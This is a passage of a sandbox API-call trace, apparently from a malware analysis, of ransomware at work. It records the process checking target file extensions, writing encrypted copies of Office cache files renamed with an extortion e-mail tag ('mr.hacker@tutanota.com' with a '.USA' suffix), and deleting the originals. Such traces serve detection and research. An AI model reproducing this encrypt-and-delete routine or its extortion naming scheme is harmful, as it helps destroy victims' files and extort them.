lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.529] lstrlenW (lpString=".zip") returned 4 [0034.529] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.529] lstrlenW (lpString=".rar") returned 4 [0034.529] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.529] lstrlenW (lpString=".bz2") returned 4 [0034.529] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.529] lstrlenW (lpString=".7z") returned 3 [0034.529] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.529] lstrlenW (lpString=".dbf") returned 4 [0034.529] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.529] lstrlenW (lpString=".1cd") returned 4 [0034.529] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.529] lstrlenW (lpString=".jpg") returned 4 [0034.529] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.530] lstrlenW (lpString=".doc") returned 4 [0034.530] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.530] lstrlenW (lpString=".docx") returned 5 [0034.530] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.530] lstrlenW (lpString=".pdf") returned 4 [0034.530] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.530] lstrlenW (lpString=".xls") returned 4 [0034.530] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.530] lstrlenW (lpString=".xlsx") returned 5 [0034.530] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.530] lstrlenW (lpString=".ppt") returned 4 [0034.530] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.530] lstrlenW (lpString=".zip") returned 4 [0034.530] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.530] lstrlenW (lpString=".rar") returned 4 [0034.530] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.530] lstrlenW (lpString=".bz2") returned 4 [0034.530] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.530] lstrlenW (lpString=".7z") returned 3 [0034.530] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.530] lstrlenW (lpString=".dbf") returned 4 [0034.530] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.530] lstrlenW (lpString=".1cd") returned 4 [0034.530] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.530] lstrlenW (lpString=".jpg") returned 4 [0034.531] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.531] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.531] lstrlenW (lpString="Setup.xml") returned 9 [0034.531] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.559] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1988) returned 1 [0034.573] CloseHandle (hObject=0x170) returned 1 [0034.577] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.584] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.585] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.585] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.585] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.585] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0034.585] GetLastError () returned 0x0 [0034.585] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x7c4, lpOverlapped=0x0) returned 1 [0034.587] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x7d0, lpOverlapped=0x0) returned 1 [0034.588] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.588] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.588] SetEndOfFile (hFile=0x180) returned 1 [0034.588] CloseHandle (hObject=0x180) returned 1 [0034.588] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.588] SetEndOfFile (hFile=0x17c) returned 1 [0034.589] CloseHandle (hObject=0x17c) returned 1 [0034.589] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.589] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.590] lstrlenW (lpString=".doc") returned 4 [0034.590] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.590] lstrlenW (lpString=".docx") returned 5 [0034.590] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.590] lstrlenW (lpString=".pdf") returned 4 [0034.590] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.590] lstrlenW (lpString=".xls") returned 4 [0034.590] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.590] lstrlenW (lpString=".xlsx") returned 5 [0034.590] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.590] lstrlenW (lpString=".ppt") returned 4 [0034.590] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.590] lstrlenW (lpString=".zip") returned 4 [0034.590] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.590] lstrlenW (lpString=".rar") returned 4 [0034.590] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.590] lstrlenW (lpString=".bz2") returned 4 [0034.590] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.590] lstrlenW (lpString=".7z") returned 3 [0034.590] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.590] lstrlenW (lpString=".dbf") returned 4 [0034.590] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.591] lstrlenW (lpString=".1cd") returned 4 [0034.591] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.591] lstrlenW (lpString=".jpg") returned 4 [0034.591] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.591] lstrlenW (lpString=".doc") returned 4 [0034.591] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.591] lstrlenW (lpString=".docx") returned 5 [0034.591] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.591] lstrlenW (lpString=".pdf") returned 4 [0034.591] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.591] lstrlenW (lpString=".xls") returned 4 [0034.591] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.591] lstrlenW (lpString=".xlsx") returned 5 [0034.591] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.591] lstrlenW (lpString=".ppt") returned 4 [0034.591] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.591] lstrlenW (lpString=".zip") returned 4 [0034.591] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.591] lstrlenW (lpString=".rar") returned 4 [0034.591] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.591] lstrlenW (lpString=".bz2") returned 4 [0034.591] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.591] lstrlenW (lpString=".7z") returned 3 [0034.591] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.591] lstrlenW (lpString=".dbf") returned 4 [0034.591] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.592] lstrlenW (lpString=".1cd") returned 4 [0034.592] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.592] lstrlenW (lpString=".jpg") returned 4 [0034.592] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.592] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.592] lstrlenW (lpString="OfficeMUI.xml") returned 13 [0034.592] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.592] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=5557) returned 1 [0034.592] CloseHandle (hObject=0x17c) returned 1 [0034.592] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 0x2020 [0034.592] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.592] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.592] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.593] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.593] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0034.593] GetLastError () returned 0x0 [0034.593] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x15b5, lpOverlapped=0x0) returned 1 [0034.594] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x15c0, lpOverlapped=0x0) returned 1 [0034.595] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.595] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xee, lpOverlapped=0x0) returned 1 [0034.596] SetEndOfFile (hFile=0x180) returned 1 [0034.596] CloseHandle (hObject=0x180) returned 1 [0034.596] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.596] SetEndOfFile (hFile=0x17c) returned 1 [0034.597] CloseHandle (hObject=0x17c) returned 1 [0034.597] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.597] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 1 [0034.598] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.598] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.598] lstrlenW (lpString=".doc") returned 4 [0034.598] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.598] lstrlenW (lpString=".docx") returned 5 [0034.598] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.598] lstrlenW (lpString=".pdf") returned 4 [0034.598] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.598] lstrlenW (lpString=".xls") returned 4 [0034.598] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.598] lstrlenW (lpString=".xlsx") returned 5 [0034.598] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.598] lstrlenW (lpString=".ppt") returned 4 [0034.598] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.598] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.598] lstrlenW (lpString=".zip") returned 4 [0034.598] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.598] lstrlenW (lpString=".rar") returned 4 [0034.598] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.598] lstrlenW (lpString=".bz2") returned 4 [0034.598] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.598] lstrlenW (lpString=".7z") returned 3 [0034.598] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.598] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.598] lstrlenW (lpString=".dbf") returned 4 [0034.598] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.598] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.599] lstrlenW (lpString=".1cd") returned 4 [0034.599] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.599] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.599] lstrlenW (lpString=".jpg") returned 4 [0034.599] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.599] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.599] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.599] lstrlenW (lpString=".doc") returned 4 [0034.599] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.599] lstrlenW (lpString=".docx") returned 5 [0034.599] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.599] lstrlenW (lpString=".pdf") returned 4 [0034.599] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.599] lstrlenW (lpString=".xls") returned 4 [0034.599] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.599] lstrlenW (lpString=".xlsx") returned 5 [0034.599] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.599] lstrlenW (lpString=".ppt") returned 4 [0034.599] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.599] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.599] lstrlenW (lpString=".zip") returned 4 [0034.599] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.599] lstrlenW (lpString=".rar") returned 4 [0034.599] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.599] lstrlenW (lpString=".bz2") returned 4 [0034.599] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.599] lstrlenW (lpString=".7z") returned 3 [0034.599] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.599] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.599] lstrlenW (lpString=".dbf") returned 4 [0034.599] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.599] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.600] lstrlenW (lpString=".1cd") returned 4 [0034.600] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.600] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.600] lstrlenW (lpString=".jpg") returned 4 [0034.600] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.600] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.600] lstrlenW (lpString="OfficeMUISet.xml") returned 16 [0034.600] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.600] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=819) returned 1 [0034.601] CloseHandle (hObject=0x17c) returned 1 [0034.601] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 0x2020 [0034.601] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.601] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.601] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.601] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.601] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0034.601] GetLastError () returned 0x0 [0034.601] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x333, lpOverlapped=0x0) returned 1 [0034.603] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x340, lpOverlapped=0x0) returned 1 [0034.604] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.604] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xf4, lpOverlapped=0x0) returned 1 [0034.604] SetEndOfFile (hFile=0x180) returned 1 [0034.604] CloseHandle (hObject=0x180) returned 1 [0034.604] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.604] SetEndOfFile (hFile=0x17c) returned 1 [0034.605] CloseHandle (hObject=0x17c) returned 1 [0034.605] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.605] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 1 [0034.606] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.606] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.606] lstrlenW (lpString=".doc") returned 4 [0034.606] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.606] lstrlenW (lpString=".docx") returned 5 [0034.606] lstrcmpiW (lpString1=".docx", lpString2="t.xml") 